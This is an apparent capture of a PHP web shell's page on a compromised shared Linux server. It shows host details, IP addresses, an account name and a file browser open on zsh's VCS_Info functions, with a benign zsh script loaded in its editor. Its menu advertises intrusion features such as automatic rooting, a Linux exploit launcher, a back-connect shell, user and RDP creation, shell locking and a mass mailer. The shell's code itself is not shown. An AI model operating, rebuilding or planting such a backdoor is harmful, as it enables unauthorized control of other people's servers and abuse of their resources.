Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
zsh /
functions /
VCS_Info /
[ HOME SHELL ]
Name
Size
Permission
Action
Backends
[ DIR ]
drwxr-xr-x
Backends.zwc
78.81
KB
-rw-r--r--
VCS_INFO_adjust
246
B
-rw-r--r--
VCS_INFO_bydir_detect
1.2
KB
-rw-r--r--
VCS_INFO_check_com
294
B
-rw-r--r--
VCS_INFO_formats
3.86
KB
-rw-r--r--
VCS_INFO_get_cmd
233
B
-rw-r--r--
VCS_INFO_hexdump
373
B
-rw-r--r--
VCS_INFO_hook
1.64
KB
-rw-r--r--
VCS_INFO_maxexports
478
B
-rw-r--r--
VCS_INFO_nvcsformats
423
B
-rw-r--r--
VCS_INFO_patch2subject
3.11
KB
-rw-r--r--
VCS_INFO_quilt
5.65
KB
-rw-r--r--
VCS_INFO_reposub
313
B
-rw-r--r--
VCS_INFO_set
865
B
-rw-r--r--
VCS_INFO_set-patch-format
2.85
KB
-rw-r--r--
vcs_info
3.83
KB
-rw-r--r--
vcs_info_hookadd
450
B
-rw-r--r--
vcs_info_hookdel
882
B
-rw-r--r--
vcs_info_lastmsg
492
B
-rw-r--r--
vcs_info_printsys
1.27
KB
-rw-r--r--
vcs_info_setsys
598
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : vcs_info_printsys
## vim:ft=zsh ## Written by Frank Terbeck <ft@bewatermyfriend.org> ## Distributed under the same BSD-ish license as zsh itself. emulate -L zsh setopt extendedglob local sys local -a disabled enabled local -A vcs_comm zstyle -a ":vcs_info:-init-:${1:-default}:-all-" "enable" enabled (( ${#enabled} == 0 )) && enabled=( all ) if (( ${+VCS_INFO_backends} == 0 )); then autoload -Uz vcs_info_setsys vcs_info_setsys fi if [[ -n ${(M)enabled:#(#i)all} ]] ; then enabled=( ${VCS_INFO_backends} ) zstyle -a ":vcs_info:-init-:${1:-default}:-all-" "disable" disabled else for sys in ${VCS_INFO_backends} ; do [[ -z ${(M)enabled:#$sys} ]] && disabled+=( ${sys} ) done enabled=( ${VCS_INFO_backends} ) fi print -l '## list of supported version control backends:' \ '## disabled systems are prefixed by a hash sign (#)' for sys in ${VCS_INFO_backends} ; do [[ -n ${(M)disabled:#${sys}} ]] && printf '#' printf '%s\n' ${sys} done print -l '## flavours (cannot be used in the enable or disable styles; they' \ '## are enabled and disabled with their master [git-svn -> git])' \ '## they *can* be used in contexts: '\'':vcs_info:git-svn:*'\''.' for sys in ${VCS_INFO_backends} ; do VCS_INFO_detect_${sys} --flavours done return 0
Close